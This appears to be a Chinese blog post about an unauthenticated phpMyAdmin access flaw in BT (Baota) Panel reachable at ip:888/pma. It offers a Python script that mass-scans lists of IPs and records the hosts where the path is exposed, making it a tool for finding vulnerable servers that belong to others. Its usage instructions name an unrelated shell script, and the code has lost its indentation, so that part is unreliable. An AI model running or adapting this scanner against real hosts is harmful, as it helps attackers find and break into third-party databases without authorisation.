脚本简介
宝塔官方表示,7.4.2(Linux)版本的宝塔面板存在未授权访问phpmyAdmin的漏洞,漏洞利用难度为“0”,通过访问ip:888/pma则可无需任何登录操作直接进入phpmyAdmin,所有使用宝塔的站点均可测试是否存在此漏洞(未修改默认端口,安装了phpmyAdmin的均存在可能);
影响范围 linux 7.4.2 Linux 7.5.13 windows 6.8(安装了 phpmyadmin)
脚本代码
这里我写了一个批量检测该漏洞的脚本,先把找到存在开放888端口的ip放到文件中,然后就可以批量检测是否存在pma目录,存在就输出到创建的文件中。
import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0'}
with open(r'路径','r',encoding = 'utf-8') as f:
a = f.readlines()
path = "/pma"
for i in a:
if i == "\n":
continue;
else:
a = i.strip()
url = a + path
try:
r = requests.get(url , headers = headers , timeout = 5).status_code
if r == 200:
c = '有漏洞' + ':' + url
with open(r'存在漏洞输出的地址','a',encoding = 'utf-8') as f:
f.write(c)
else:
print('无')
pass
except:
print('无法连接')使用方法
修改后上传到服务器 cd到目录执行
bash GetLinuxPanel.sh
评论 (0)